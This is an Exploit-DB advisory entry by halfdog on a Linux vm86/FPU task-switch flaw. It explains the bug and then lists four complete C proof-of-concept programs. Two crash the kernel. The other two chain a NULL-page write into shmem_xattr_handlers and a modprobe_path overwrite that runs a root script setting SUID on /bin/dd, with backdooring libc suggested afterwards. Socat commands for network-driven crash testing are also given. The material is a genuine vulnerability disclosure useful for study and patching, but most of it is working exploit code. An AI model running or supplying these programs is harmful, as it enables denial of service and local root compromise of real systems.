Vm86 - Syscall Task Switch Kernel Panic (Denial of Service) / Privilege Escalation

EDB-ID: 41766
CVE: N/A
Author: halfdog
Type: local
Platform: Linux
Published: 2012-10-19

Source: http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/

## Introduction

Problem description: The initial observation was that the Linux vm86 syscall, which lets userspace programs use virtual-8086 mode to emulate old 8086 software (as dosemu does), was prone to triggering FPU errors. Closer analysis showed that, more generally, the handling of the FPU control register and of unhandled FPU exceptions could trigger CPU exceptions at unexpected locations, including ring-0 code. The key player is the emms instruction, which faults when, for example, cr0 has bits set due to unhandled errors. Only kernels running on some processor architectures are affected; currently only AMD K7/K8 seems to be relevant.

## Methods

Virtual86SwitchToEmmsFault.c (http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/Virtual86SwitchToEmmsFault.c) was the first POC; it triggers a kernel panic via the vm86 syscall. Depending on task layout and kernel scheduler timing, the program might just cause an OOPS without serious side effects on the system. The OOPS might occur up to 1 min after invocation, depending on scheduler operation and on which other tasks are using the FPU. Sometimes it causes recursive page faults, locking up the entire machine.
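
The POC listing further down enters virtual-8086 mode with cs=0x1000 and eip=0x0 and maps its memory at 0x10000. A minimal sketch of the real-mode address arithmetic that links those values; the helper name `vm86LinearAddress` is made up for illustration and is not part of the POC:

```c
#include <stdint.h>

/* Hypothetical helper, not part of the original POC: real-mode and
 * virtual-8086 addressing form a linear address as segment * 16 + offset. */
uint32_t vm86LinearAddress(uint16_t segment, uint16_t offset) {
  return ((uint32_t)segment << 4) + offset;
}
```

With the values from the listing, `vm86LinearAddress(0x1000, 0x0)` gives 0x10000, the address passed to mmap, and the initial stack pointer ss:esp=0x1000:0x400 gives 0x10400.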

To allow reproducible tests on at least a local machine, the random code execution test tool (Virtual86RandomCode.c - http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/Virtual86RandomCode.c) might be useful. It still uses the vm86 syscall but executes random code, causing the FPU and the task scheduler to trigger a multitude of faults and lock up the system faster. When the tool is run over the network, the random data it executes can be recorded and replayed even if the target machine locks up completely. Network test:

socat TCP4-LISTEN:1234,reuseaddr=1,fork=1 EXEC:./Virtual86RandomCode,nofork=1

tee TestInput < /dev/urandom | socat - TCP4:x.x.x.x:1234 > ProcessedBlocks
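
Judging from the Virtual86RandomCode.c listing below, the tool echoes each block to stdout as a 4-byte length in native byte order followed by the block data, so ProcessedBlocks should be a sequence of such records. A rough sketch of a reader that counts the complete records, for example to find the last block delivered before a lock-up. The function name `countRecordedBlocks` is made up for illustration, and a 32-bit int with the same byte order on both machines is assumed:

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical helper: count complete (length, data) records in a
 * stream written by Virtual86RandomCode. Counting stops at the first
 * truncated record or non-positive length. */
long countRecordedBlocks(FILE *in) {
  long blocks = 0;
  int32_t length;

  while (fread(&length, sizeof(length), 1, in) == 1) {
    if (length <= 0) break;          /* defensive: not a valid block */
    /* Skip the payload byte by byte so that pipes work as well. */
    int32_t remaining = length;
    while (remaining > 0 && fgetc(in) != EOF) remaining--;
    if (remaining) break;            /* truncated final record */
    blocks++;
  }
  return blocks;
}
```

Comparing the number of complete records with the size of TestInput shows how much of the input had been consumed when the target stopped responding.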

An improved version brings the FPU into the same state without using the vm86 syscall. The key instruction is fldcw (floating point unit load control word). When one process enables FPU exceptions just before it exits, a later task switch between two other processes might fail. It seems that, because of that failure, task->nsproxy ends up being NULL, causing a NULL-pointer dereference in exit_shm during do_exit.
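
In the x87 control word, bits 0 to 5 are the exception mask bits (invalid operation, denormal, zero divide, overflow, underflow, precision); a set bit masks the corresponding exception. The listing below clears all six by ANDing the stored control word with 0xffc0 before fldcw. A minimal sketch of that bit arithmetic alone, without touching the real FPU; the function and macro names are hypothetical:

```c
#include <stdint.h>

/* Bits 0..5 of the x87 control word mask the six FPU exceptions. */
#define X87_EXCEPTION_MASKS 0x003fu

/* Hypothetical helper: return the control word with all six
 * exceptions unmasked, as "andl $0xffc0" does in the listing. */
uint16_t unmaskX87Exceptions(uint16_t controlWord) {
  return (uint16_t)(controlWord & ~X87_EXCEPTION_MASKS);
}
```

For the FNINIT default control word 0x037f this gives 0x0340: rounding and precision control are unchanged, but FPU errors are no longer masked.
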
When the NULL page is mapped, the NULL dereference can be used to fake an rw-semaphore data structure. In exit_shm, the kernel attempts to down_write the semaphore, which adds the value 0xffff0001 at a user-controllable location. Since the NULL dereference does not allow arbitrary reads, the task memory layout is unknown, so the standard approach of changing the EUID of the running task is not possible. Apart from that, we are in do_exit, so we would have to change another task anyway. A suitable target is the shmem_xattr_handlers list, which is at an address known from System.map. Usually it contains two valid handlers and a NULL value that terminates the list. As we are lucky, the value after NULL is 1, so adding 0xffff0001 at the address of the NULL value plus 2 turns the NULL into 0x10000 (the first address above mmap_min_addr) and the following 1 into NULL, terminating the handler list correctly again.
The code that performs these steps can be found in FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c (http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c).
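
The effect of the misaligned addition can be checked in userspace on a copy of the list tail. A minimal sketch, assuming 32-bit little-endian words as on i386; the buffer only stands in for kernel memory and both function names are made up for illustration:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: read the little-endian 32-bit word stored at
 * byte offset `offset` of `buf`. */
uint32_t loadWord(const uint8_t *buf, size_t offset) {
  return (uint32_t)buf[offset] | ((uint32_t)buf[offset + 1] << 8) |
         ((uint32_t)buf[offset + 2] << 16) | ((uint32_t)buf[offset + 3] << 24);
}

/* Hypothetical helper: add `value` to the 32-bit word at byte offset
 * `offset`, wrapping modulo 2^32 like an in-place 32-bit add. */
void addToWord(uint8_t *buf, size_t len, size_t offset, uint32_t value) {
  assert(offset + 4 <= len);
  uint32_t word = loadWord(buf, offset) + value;
  for (int i = 0; i < 4; i++) {
    buf[offset + i] = (uint8_t)(word >> (8 * i));
  }
}
```

Starting from the list tail { NULL, 1 }, i.e. the bytes 00 00 00 00 01 00 00 00, the word at offset 2 reads 0x00010000. `addToWord(tail, 8, 2, 0xffff0001)` wraps it to 0x00000001 and leaves the bytes 00 00 01 00 00 00 00 00, so `loadWord(tail, 0)` is 0x10000 and `loadWord(tail, 4)` is 0.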

The modification of the shmem_xattr_handlers list is completely silent (it could make a nice data-only backdoor) until someone performs a getxattr call on a mounted tmpfs. Since such a file system is mounted by default at /run/shm, another program can turn this into arbitrary ring-0 code execution. To avoid searching the process list in order to set EUID=0, an alternative approach was tested. When the xattr handlers are invoked, a single integer write to another static address known from System.map (modprobe_path) changes the default modprobe userspace helper pathname from /sbin/modprobe to /tmp//modprobe. When an unknown executable format or network protocol is requested, the program /tmp//modprobe is executed as root; this demo just installs a script there that turns /bin/dd into a SUID binary. dd could then be used to modify libc to plant another backdoor there. The code that performs these steps can be found in ManipulatedXattrHandlerForPrivEscalation.c (http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ManipulatedXattrHandlerForPrivEscalation.c).
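
The single 32-bit write replaces the four bytes "sbin" after the leading slash with "tmp/", which is why the resulting path contains a double slash. A userspace sketch of the same overwrite on an ordinary string copy; the function name is hypothetical and nothing here touches kernel memory:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: overwrite bytes 1..4 of `path` with "tmp/",
 * mimicking the 4-byte store performed by the handler code. */
void redirectHelperPath(char *path) {
  assert(strlen(path) >= 5);
  memcpy(path + 1, "tmp/", 4);
}
```

Applied to a writable copy of "/sbin/modprobe", this yields "/tmp//modprobe"; the string length and the terminating NUL are unchanged, so a single aligned-size store is enough.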




--- Virtual86SwitchToEmmsFault.c ---
/** This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidental, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *
 *  Copyright (c) 2013 halfdog <me (%) halfdog.net>
 *
 *  This program maps memory pages to the low range above 64k to
 *  avoid conflicts with /proc/sys/vm/mmap_min_addr and then
 *  enters virtual-86 mode. Due to unhandled FPU errors, task
 *  switches will fail afterwards, and the kernel will attempt to
 *  kill other tasks when switching.
 *
 *  gcc -o Virtual86SwitchToEmmsFault Virtual86SwitchToEmmsFault.c
 *
 *  See http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ for more information.
 */

#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/vm86.h>
#include <unistd.h>


static const char *DEDICATION="To the most adorable person met so far.";


static void handleSignal(int value, siginfo_t *sigInfo, void *context) {
  fprintf(stderr, "Handling signal\n");
}


void runTest(void *realMem) {
  struct vm86plus_struct vm86struct;
  int		result;

  memset(&vm86struct, 0, sizeof(vm86struct));
  vm86struct.regs.eip=0x0;
  vm86struct.regs.cs=0x1000;
// IOPL_MASK (0x3000) plus reserved bit 1; IF_MASK (0x200) is not set
  vm86struct.regs.eflags=0x3002;

  vm86struct.regs.esp=0x400;
  vm86struct.regs.ss=0x1000;
  vm86struct.regs.ebp=vm86struct.regs.esp;
  vm86struct.regs.ds=0x1000;
  vm86struct.regs.fs=0x1000;
  vm86struct.regs.gs=0x1000;
  vm86struct.flags=0x0L;
  vm86struct.screen_bitmap=0x0L;
  vm86struct.cpu_type=0x0L;
 
  alarm(1);
  
  result=vm86(VM86_ENTER, &vm86struct);
  if(result) {
    fprintf(stderr, "vm86 failed, error %d (%s)\n", errno,
        strerror(errno));
  }
}


int main(int argc, char **argv) {
  struct sigaction sigAction;

  int		realMemSize=1<<20;
  void		*realMem;
  int		result;

  sigAction.sa_sigaction=handleSignal;
  sigfillset(&sigAction.sa_mask);
  sigAction.sa_flags=SA_SIGINFO;
  sigAction.sa_restorer=NULL;
  sigaction(SIGILL, &sigAction, NULL); // 4
  sigaction(SIGFPE, &sigAction, NULL); // 8
  sigaction(SIGSEGV, &sigAction, NULL); // 11
  sigaction(SIGALRM, &sigAction, NULL); // 14

  realMem=mmap((void*)0x10000, realMemSize, PROT_EXEC|PROT_READ|PROT_WRITE,
      MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
  if(realMem==(void*)-1) {
    fprintf(stderr, "Failed to map real-mode memory space\n");
    return(1);
  }

  memset(realMem, 0, realMemSize);
  memcpy(realMem, "\xda\x44\x00\xd9\x2f\xae", 6);

  runTest(realMem);
}
--- EOF ---

--- Virtual86RandomCode.c ---
/** This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidental, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *
 *  Copyright (c) 2013 halfdog <me (%) halfdog.net>
 *
 *  This program maps memory pages to the low range above 64k to
 *  avoid conflicts with /proc/sys/vm/mmap_min_addr and then
 *  enters virtual-86 mode.
 *
 *  gcc -o Virtual86RandomCode Virtual86RandomCode.c
 *
 *  Usage: ./Virtual86RandomCode < /dev/urandom > /dev/null
 *
 *  See http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ for more information.
 */

#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/vm86.h>
#include <unistd.h>


static const char *DEDICATION="To the most adorable person met so far.";


static void handleSignal(int value, siginfo_t *sigInfo, void *context) {
  fprintf(stderr, "Handling signal\n");
}


int readFully(int inputFd, void *data, int length) {
  char *cursor=data;
  int readLength=0;
  int result;

  while(length) {
    result=read(inputFd, cursor, length);
    if(result<0) {
      if(!readLength) readLength=result;
      break;
    }
// End of input: return the short count instead of spinning forever
    if(!result) break;
    readLength+=result;
    length-=result;
    cursor+=result;
  }
  return(readLength);
}


void runTest(void *realMem) {
  struct vm86plus_struct	vm86struct;
  int		result;


  memset(&vm86struct, 0, sizeof(vm86struct));
  vm86struct.regs.eip=0x0;
  vm86struct.regs.cs=0x1000;
// IOPL_MASK (0x3000) plus reserved bit 1; IF_MASK (0x200) is not set
  vm86struct.regs.eflags=0x3002;

// Do not use stack above 
  vm86struct.regs.esp=0x400;
  vm86struct.regs.ss=0x1000;
  vm86struct.regs.ebp=vm86struct.regs.esp;
  vm86struct.regs.ds=0x1000;
  vm86struct.regs.fs=0x1000;
  vm86struct.regs.gs=0x1000;
  vm86struct.flags=0x0L;
  vm86struct.screen_bitmap=0x0L;
  vm86struct.cpu_type=0x0L;
 
  alarm(1);
  
  result=vm86(VM86_ENTER, &vm86struct);
  if(result) {
    fprintf(stderr, "vm86 failed, error %d (%s)\n", errno,
        strerror(errno));
  }
}


int main(int argc, char **argv) {
  struct sigaction sigAction;

  int		realMemSize=1<<20;
  void		*realMem;
  int		randomFd=0;
  int		result;

  sigAction.sa_sigaction=handleSignal;
  sigfillset(&sigAction.sa_mask);
  sigAction.sa_flags=SA_SIGINFO;
  sigAction.sa_restorer=NULL;
  sigaction(SIGILL, &sigAction, NULL); // 4
  sigaction(SIGFPE, &sigAction, NULL); // 8
  sigaction(SIGSEGV, &sigAction, NULL); // 11
  sigaction(SIGALRM, &sigAction, NULL); // 14

  realMem=mmap((void*)0x10000, realMemSize, PROT_EXEC|PROT_READ|PROT_WRITE,
      MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
  if(realMem==(void*)-1) {
    fprintf(stderr, "Failed to map real-mode memory space\n");
    return(1);
  }

  result=readFully(randomFd, realMem, realMemSize);
  if(result!=realMemSize) {
    fprintf(stderr, "Failed to read random data\n");
    return(0);
  }

  write(1, &result, 4);
  write(1, realMem, realMemSize);
  while(1) {
    runTest(realMem);

    result=readFully(randomFd, realMem, 0x1000);
// Stop on read error or end of input, never write a negative length
    if(result<=0) break;
    write(1, &result, 4);
    write(1, realMem, result);
  }
}
--- EOF ---

--- FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c ---
/** This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidental, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *
 *  Copyright (c) 2014 halfdog <me (%) halfdog.net>
 *
 *  This program maps a NULL page to exploit a kernel NULL-dereference.
 *  Usually that will not work due to sane /proc/sys/vm/mmap_min_addr
 *  settings. An unhandled FPU error causes part of task switching
 *  to fail resulting in NULL-pointer dereference. This can be
 *  used to add 0xffff0001 to an arbitrary memory location, one
 *  of the entries in shmem_xattr_handlers is quite suited because
 *  it has a static address, which can be found in System.map.
 *  Another tool (ManipulatedXattrHandlerForPrivEscalation.c)
 *  could then be used to invoke the xattr handlers, thus giving
 *  local root privilege escalation.
 *
 *  gcc -o FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c
 *
 *  See http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ for more information.
 */

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <unistd.h>


static const char *DEDICATION="To the most adorable person met so far.";



int main(int argc, char **argv) {
  int		childPid;
  int		sockFds[2];
  int		localSocketFd;
  int		requestCount;
  int		result;


// Cleanup beforehand to avoid interference from previous run
  asm volatile (
    "emms;"
    : // output (0)
    :
    :
  );

  childPid=fork();
  if(childPid>0) {
    mmap((void*)0, 1<<12, PROT_EXEC|PROT_READ|PROT_WRITE,
         MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);

// down_write just adds 0xffff0001 at offset +0x6c from the memory
// address stored below. The shmem_xattr_handlers list is at
// 0xc150ae1c and contains two valid handlers, terminated by a
// NULL value. As we are lucky, the value after NULL is 1, thus
// storing shmem_xattr_handlers + 0xa - 0x6c makes the addition hit
// shmem_xattr_handlers + 0xa (the NULL entry plus 2). This turns
// the NULL into 0x10000 and the following 1 into NULL, hence
// the handler list is terminated correctly again.
    *((int*)0x8)=0xc150adba;

    result=socketpair(AF_UNIX, SOCK_STREAM, 0, sockFds);

    result=fork();
    close(sockFds[result?1:0]);
    localSocketFd=sockFds[result?0:1];
    asm volatile (
      "emms;"
      : // output (0)
      :
      :
    );

    fprintf(stderr, "Playing task switch ping-pong ...\n");
// This might be too short on faster CPUs?
    for(requestCount=0x10000; requestCount; requestCount--) {
      result=write(localSocketFd, sockFds, 4);
      if(result!=4) break;
      result=read(localSocketFd, sockFds, 4);
      if(result!=4) break;
      asm volatile (
        "fldz;"
        "fldz;"
        "fdivp;"
        : // output (0)
        :
        :
      );
    }
    close(localSocketFd);
    fprintf(stderr, "Switch loop terminated\n");

// Cleanup afterwards
    asm volatile (
      "emms;"
      : // output (0)
      :
      :
    );

    return(0);
  }

  usleep(10000);

// Enable FPU exceptions
  asm volatile (
    "fdivp;"
    "fstcw %0;"
    "andl $0xffc0, %0;"
    "fldcw %0;"
    : "=m"(result) // output (0)
    :
    :"%eax" // Clobbered register
  );

// Terminate immediately, this seems to improve results
  return(0);
}
--- EOF ---

--- ManipulatedXattrHandlerForPrivEscalation.c ---
/** This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidental, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *
 *  Copyright (c) 2014 halfdog <me (%) halfdog.net>
 *
 *  This program prepares memory so that the manipulated shmem_xattr_handlers
 *  (see FpuStateTaskSwitchShmemXattrHandlersOverwriteWithNullPage.c)
 *  will be read from here, thus giving ring-0 code execution.
 *  To avoid fiddling with task structures, this will overwrite
 *  just 4 bytes of modprobe_path, which is used by the kernel
 *  when unknown binary formats or network protocols are requested.
 *  In the end, when executing an unknown binary format, the modified
 *  modprobe script will just turn "/bin/dd" to be SUID, e.g. to
 *  own libc later on.
 *
 *  gcc -o ManipulatedXattrHandlerForPrivEscalation ManipulatedXattrHandlerForPrivEscalation.c
 *
 *  See http://www.halfdog.net/Security/2013/Vm86SyscallTaskSwitchKernelPanic/ for more information.
 */

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/xattr.h>
#include <unistd.h>


static const char *DEDICATION="To the most adorable person met so far.";


int main(int argc, char **argv) {
  void *handlerPage;
  int	*handlerStruct;
  void	*handlerCode;
  char	*modprobeCommands="#!/bin/sh\nchmod u+s /bin/dd\n";

  int	result;

  handlerStruct=(int*)0x10000;
  handlerPage=mmap((void*)(((int)handlerStruct)&0xfffff000), 1<<12,
      PROT_EXEC|PROT_READ|PROT_WRITE,
      MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
  if(handlerPage==(void*)-1) {
    fprintf(stderr, "Failed to map handler page\n");
    return(1);
  }
  fprintf(stderr, "Handler page at %p\n", handlerPage);

  *handlerStruct=(int)(handlerStruct+0x10); // Prefix pointer
  strcpy((char*)(handlerStruct+0x10), "system"); // Prefix value

  handlerCode=(void*)(handlerStruct+0x100);
  *(handlerStruct+0x2)=(int)handlerCode; // list
  *(handlerStruct+0x3)=(int)handlerCode; // get
  *(handlerStruct+0x4)=(int)handlerCode; // set

// Switch the modprobe helper path from /sbin to /tmp. Address is
// known from kernel version's symbols file
  memcpy(handlerCode, "\xb8\xa1\x2d\x50\xc1\xc7\x00tmp/\xc3", 12);

  result=getxattr("/run/shm/", "system.dont-care", handlerPage, 1);
  fprintf(stderr, "getxattr result: 0x%x, error %d (%s)\n", result,
      errno, strerror(errno));

  result=open("/tmp/modprobe", O_RDWR|O_CREAT, S_IRWXU|S_IRWXG|S_IRWXO);
  write(result, modprobeCommands, strlen(modprobeCommands));
  close(result);

// Create a pseudo-binary with just NULL bytes, executing it will
// trigger the binfmt module loading
  result=open("/tmp/dummy", O_RDWR|O_CREAT, S_IRWXU|S_IRWXG|S_IRWXO);
  memset(handlerPage, 0, 1<<12);
  write(result, handlerPage, 1<<12);
  close(result);
  *(int*)handlerPage=(int)"/tmp/dummy";
  execve("/tmp/dummy", handlerPage, NULL);
  return(0);
}
--- EOF ---